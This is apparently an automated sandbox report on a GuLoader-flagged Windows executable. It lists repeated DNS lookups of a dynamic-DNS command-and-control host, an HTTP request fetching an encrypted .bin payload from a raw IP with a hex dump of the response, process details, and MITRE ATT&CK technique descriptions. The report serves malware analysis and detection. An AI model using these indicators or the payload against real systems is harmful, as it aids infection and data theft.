Aug 3, 2021 18:03:32.305104971 CEST	8.8.8.8	192.168.2.7	0x8b08	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:34.674105883 CEST	8.8.8.8	192.168.2.7	0x8116	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:36.870151043 CEST	8.8.8.8	192.168.2.7	0xd602	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:39.802304029 CEST	8.8.8.8	192.168.2.7	0x16a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:42.600116968 CEST	8.8.8.8	192.168.2.7	0x92f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:44.808240891 CEST	8.8.8.8	192.168.2.7	0x88a6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:47.031979084 CEST	8.8.8.8	192.168.2.7	0xa4e6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:49.317770004 CEST	8.8.8.8	192.168.2.7	0xdf82	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:51.520335913 CEST	8.8.8.8	192.168.2.7	0xff63	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:53.726793051 CEST	8.8.8.8	192.168.2.7	0xa21c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:55.942558050 CEST	8.8.8.8	192.168.2.7	0x8a7e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:03:58.180290937 CEST	8.8.8.8	192.168.2.7	0x5e20	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:00.387912989 CEST	8.8.8.8	192.168.2.7	0x4f3b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:02.602576017 CEST	8.8.8.8	192.168.2.7	0xa9e6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:04.860369921 CEST	8.8.8.8	192.168.2.7	0x8f00	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:07.058125019 CEST	8.8.8.8	192.168.2.7	0xf3e7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:09.243210077 CEST	8.8.8.8	192.168.2.7	0xb88c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:11.430680037 CEST	8.8.8.8	192.168.2.7	0xd8f3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:13.775387049 CEST	8.8.8.8	192.168.2.7	0x4252	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:16.467454910 CEST	8.8.8.8	192.168.2.7	0xc1ac	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:18.651566029 CEST	8.8.8.8	192.168.2.7	0x17fb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:20.887847900 CEST	8.8.8.8	192.168.2.7	0x6718	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:23.075534105 CEST	8.8.8.8	192.168.2.7	0x9b99	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:25.284774065 CEST	8.8.8.8	192.168.2.7	0x1bb4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:27.485532999 CEST	8.8.8.8	192.168.2.7	0x108a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:29.703403950 CEST	8.8.8.8	192.168.2.7	0x8de1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:31.897357941 CEST	8.8.8.8	192.168.2.7	0x13ad	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:34.277890921 CEST	8.8.8.8	192.168.2.7	0xd2b9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:36.511339903 CEST	8.8.8.8	192.168.2.7	0xcd9d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:38.731224060 CEST	8.8.8.8	192.168.2.7	0xa6cb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:40.959721088 CEST	8.8.8.8	192.168.2.7	0xf65d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:43.182590008 CEST	8.8.8.8	192.168.2.7	0xcbd7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:45.390722990 CEST	8.8.8.8	192.168.2.7	0x19e1	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:47.577378988 CEST	8.8.8.8	192.168.2.7	0xbde2	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:49.836647987 CEST	8.8.8.8	192.168.2.7	0x8f91	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:53.229334116 CEST	8.8.8.8	192.168.2.7	0xa6f0	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:55.424460888 CEST	8.8.8.8	192.168.2.7	0x2fd6	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:57.624083042 CEST	8.8.8.8	192.168.2.7	0x813d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:04:59.828027010 CEST	8.8.8.8	192.168.2.7	0x903a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:02.019203901 CEST	8.8.8.8	192.168.2.7	0x264a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:04.214956045 CEST	8.8.8.8	192.168.2.7	0xefb3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:06.404021978 CEST	8.8.8.8	192.168.2.7	0x4fc4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:08.625143051 CEST	8.8.8.8	192.168.2.7	0xd1f4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:11.801686049 CEST	8.8.8.8	192.168.2.7	0x5a16	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:14.028672934 CEST	8.8.8.8	192.168.2.7	0x8e29	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:16.217849970 CEST	8.8.8.8	192.168.2.7	0x3c60	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:18.415306091 CEST	8.8.8.8	192.168.2.7	0xedbb	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:20.610532999 CEST	8.8.8.8	192.168.2.7	0x9e9	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:22.797117949 CEST	8.8.8.8	192.168.2.7	0x378	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:25.036484957 CEST	8.8.8.8	192.168.2.7	0x87e4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:27.255598068 CEST	8.8.8.8	192.168.2.7	0xd4aa	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:30.754188061 CEST	8.8.8.8	192.168.2.7	0x1d87	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:33.063888073 CEST	8.8.8.8	192.168.2.7	0x4a12	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:35.264806032 CEST	8.8.8.8	192.168.2.7	0x7c58	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:37.485719919 CEST	8.8.8.8	192.168.2.7	0x9baa	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:39.687992096 CEST	8.8.8.8	192.168.2.7	0x643f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:41.925355911 CEST	8.8.8.8	192.168.2.7	0x582d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:44.133326054 CEST	8.8.8.8	192.168.2.7	0x835d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:46.355571032 CEST	8.8.8.8	192.168.2.7	0xb619	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:49.114978075 CEST	8.8.8.8	192.168.2.7	0xad66	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:51.315931082 CEST	8.8.8.8	192.168.2.7	0x2e1a	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:53.529486895 CEST	8.8.8.8	192.168.2.7	0x421b	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:55.736372948 CEST	8.8.8.8	192.168.2.7	0xc87	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:05:57.963054895 CEST	8.8.8.8	192.168.2.7	0xee3f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:00.164889097 CEST	8.8.8.8	192.168.2.7	0xe089	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:02.375046968 CEST	8.8.8.8	192.168.2.7	0xc548	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:04.589843035 CEST	8.8.8.8	192.168.2.7	0x86c3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:06.815399885 CEST	8.8.8.8	192.168.2.7	0x4a5c	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:09.012912989 CEST	8.8.8.8	192.168.2.7	0x9c4	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:11.242706060 CEST	8.8.8.8	192.168.2.7	0x33ba	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:13.507868052 CEST	8.8.8.8	192.168.2.7	0x571e	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:15.697130919 CEST	8.8.8.8	192.168.2.7	0x6b30	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:17.896765947 CEST	8.8.8.8	192.168.2.7	0x4ea5	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:20.259336948 CEST	8.8.8.8	192.168.2.7	0x1cc7	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:22.522475958 CEST	8.8.8.8	192.168.2.7	0xb059	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:24.743968964 CEST	8.8.8.8	192.168.2.7	0x437f	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:26.943700075 CEST	8.8.8.8	192.168.2.7	0x4247	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:29.156662941 CEST	8.8.8.8	192.168.2.7	0x5512	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:31.352756023 CEST	8.8.8.8	192.168.2.7	0xd5e3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:33.561729908 CEST	8.8.8.8	192.168.2.7	0xf54d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:35.760827065 CEST	8.8.8.8	192.168.2.7	0x75c3	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:37.989125013 CEST	8.8.8.8	192.168.2.7	0xc0a5	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:41.071511984 CEST	8.8.8.8	192.168.2.7	0x7b64	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:43.277365923 CEST	8.8.8.8	192.168.2.7	0x1d	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:45.470468044 CEST	8.8.8.8	192.168.2.7	0xfd8	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:47.667928934 CEST	8.8.8.8	192.168.2.7	0xb137	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)
Aug 3, 2021 18:06:49.857407093 CEST	8.8.8.8	192.168.2.7	0x7a24	No error (0)	wealthyrem.ddns.net		194.5.97.128	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

101.99.94.119

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49745	101.99.94.119	80	C:\Users\user\Desktop\JXblq0dqPN.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:00:39.972902060 CEST	11253	OUT	GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 101.99.94.119 Cache-Control: no-cache
Aug 3, 2021 18:00:40.022622108 CEST	11255	IN	HTTP/1.1 200 OK Date: Tue, 03 Aug 2021 16:00:39 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 Last-Modified: Mon, 02 Aug 2021 21:02:57 GMT ETag: "72840-5c899e4c3da73" Accept-Ranges: bytes Content-Length: 469056 Content-Type: application/octet-stream Data Raw: 31 79 a2 69 b5 67 ac a3 66 68 89 94 04 1b b4 8f c9 36 a1 00 58 5a db 92 66 6d cc 77 0a bf 4e 76 be cb df 4e 9d df 64 5e 44 ed 21 f3 cf f9 7d 62 b4 1b 44 fc 1e d1 54 51 7a 33 c1 4c df e6 15 ab fc 9f 41 d1 41 8f 51 31 14 c8 d8 11 ba 23 86 c1 35 93 9d fc 44 9e 32 ca a0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 21 67 d6 a5 5b 6f 63 6f 44 5d 92 7d a4 66 fa 44 00 3d 71 d6 5c 03 88 d7 97 a0 3d f6 3d 55 3c 74 0e f3 18 b3 74 b0 8f 9b fc 7f 70 16 c6 64 54 6e 65 de 18 f0 d3 5c bc 13 45 22 ac 24 20 7e 82 b9 70 76 a4 7d 01 f7 d5 61 be 6f 06 f4 2c 87 a6 b3 20 b2 ad 40 2e d1 2f 53 60 03 72 48 d8 a8 33 13 0a f2 ff d2 dd 78 63 a0 8b 27 17 28 0e 60 82 f6 72 ae 94 e0 7b d9 7f 8e c3 dd 64 b8 7a 3f 9c de 07 ce e8 0f a5 e2 f6 89 60 01 25 fd 8a 32 fc 79 07 a7 ab df eb 97 4a 2c 9a 34 91 22 ae 83 f5 10 09 71 2b 83 86 cf 6e c1 fd 78 9b ff 23 b1 96 1b 1e b1 63 5b 3d 90 ef 89 7e 8a 22 4d e5 54 77 c8 44 5a ca a4 4c 7d b5 c0 fc c0 dd 2e 18 32 28 dd ca 3a 96 9c 05 f0 1c 01 92 09 ad 55 8b 34 03 76 7c 2a c7 57 01 af c3 92 f4 fe a1 46 ae cb 12 c4 67 bb f2 9c 4b c8 90 cb 0b 36 3d a2 cf d6 65 cd 91 6d 1a 7b b3 ae 5d b5 71 0a 24 46 d2 95 ab 70 f8 9c 0c 0f 55 c2 c0 0c ed 95 d2 b5 e3 48 48 bc f0 3e 3a 82 e8 91 28 22 11 91 fd 50 31 d0 48 57 96 73 6f 6f ab 25 0c 11 ac 70 08 53 83 83 3f b8 3e c5 49 ba 0a e0 6c cd 20 3a db 77 67 8e fb 36 1e cb 1f 01 03 9a 71 8e 49 ed 61 2c 69 21 ad ce f9 ee ff ec 84 8e 6d 86 db b8 3f b7 03 e2 7f 24 ba 8c 67 c8 40 b0 eb df 8a b4 91 9b 4f 28 1a 3b 00 71 28 06 b7 a3 84 fa b2 23 5c 4c 76 b9 6d c0 ea b6 ba 5f 07 9a 82 96 5b b9 53 9d 33 fd 1b e9 51 5d 11 32 aa ab 37 a4 e9 e4 ed 8f 5f a9 dd 16 e8 f1 02 6d 5d 93 67 0b b1 97 41 ba 80 65 d4 cc ba 7e b1 6e be 4b 0a b7 2c 68 50 ad 15 84 32 c1 47 3e 78 a2 f0 ac 5e f6 53 15 d2 d0 93 e0 68 65 1c ab 21 69 d6 3b e3 69 9c 2b 10 57 7b 25 d8 99 a9 23 1e 80 6a 8b d0 4c c9 98 5f 04 ad 20 6e 20 e0 d4 86 3d d5 78 c0 63 00 93 0d 76 4f fd ab d5 50 53 0c fd ae b8 f8 84 03 9c dc 98 09 3d 1f 8f 80 de 9c d3 a6 97 0b fa 1a 66 11 63 4d 31 1f 06 d7 7e 4c ea b2 0d 17 00 0e 9f e1 20 97 00 06 32 b2 d4 a3 8a ef 7a 40 7f dd 0c 11 b7 be c1 20 e1 bb 88 08 d8 e9 42 02 00 36 78 93 28 da 41 52 f9 96 9e c3 54 a2 68 b6 e1 93 f8 b8 d3 15 6d 42 73 42 64 ce 30 64 40 c6 a3 ef ed a2 d8 77 ce b3 d0 4e 87 51 cd 57 42 a7 9e 1f fa 7c 71 00 a0 0e f5 10 6a ff 84 ee f7 d2 d0 7f 20 ec 19 ab 75 73 9c 02 41 31 3d 88 d3 19 ed 16 29 30 07 c6 5c c1 5b bd a4 4b 02 bc c6 24 24 f2 cb 2e 0a a2 1f a2 53 16 ba b6 66 85 70 87 87 55 7d 12 44 66 c1 b9 46 4e 1e a0 dc 7a e0 ca 8e 6e f8 1e 4b 3f 65 f2 b4 35 8e 12 2c b3 7e 16 04 83 d2 5c fc e9 9c 64 d2 98 66 e9 42 4b 0b ac c1 11 2d 8f b1 c5 d1 d1 42 8f 51 31 10 c8 d8 11 45 dc 86 c1 8d 93 9d fc 44 9e 32 ca e0 fd 73 d9 cb f8 37 88 87 1a 45 0a f7 90 fa bf 49 a3 1e a6 e2 63 d3 da f7 1b 8c 3f 3b 56 fb 73 f5 5f 71 11 31 66 d6 a5 55 70 d9 61 44 e9 9b b0 85 de fb 08 cd 1c 25 be 35 70 a8 a7 e5 cf 5a 84 5c 38 1c 17 6f 9d 76 dc 00 90 ed fe dc 0d 05 78 e6 0d 3a 4e 21 91 4b d0 be 33 d8 76 6b 2f a1 2e 04 7e 82 b9 70 76 a4 7d ab 74 97 51 50 8d 2a 97 c2 65 8a Data Ascii: 1yigfh6XZfmwNvNd^D!}bDTQz3LAAQ1#5D2s7EIc?;Vs_q!g[ocoD]}fD=q\==U<ttpdTne\E"$ ~pv}ao, @./S`rH3xc'(`r{dz?`%2yJ,4"q+nx#c[=~"MTwDZL}.2(:U4v\|WFgK6=em{]q$FpUHH>:("P1HWsoo%pS?>Il :wg6qIa,i!m?$g@O(;q(#\Lvm_[S3Q]27_m]gAe~nK,hP2G>x^She!i;i+W{%#jL_ n =xcvOPS=fcM1~L 2z@ B6x(ARThmBsBd0d@wNQWB\|qj usA1=)0\[K$$.SfpU}DfFNznK?e5,~\dfBK-BQ1ED2s7EIc?;Vs_q1fUpaD%5pZ\8ovx:N!K3vk/.~pv}tQPe

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: JXblq0dqPN.exe PID: 5988 Parent PID: 5576

General

Start time:	17:58:19
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\JXblq0dqPN.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\JXblq0dqPN.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	8718D75B7CAC53F13D01DDEA9B52CEE0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: JXblq0dqPN.exe PID: 4576 Parent PID: 5988

General

Start time:	17:59:33
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\JXblq0dqPN.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\JXblq0dqPN.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	8718D75B7CAC53F13D01DDEA9B52CEE0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

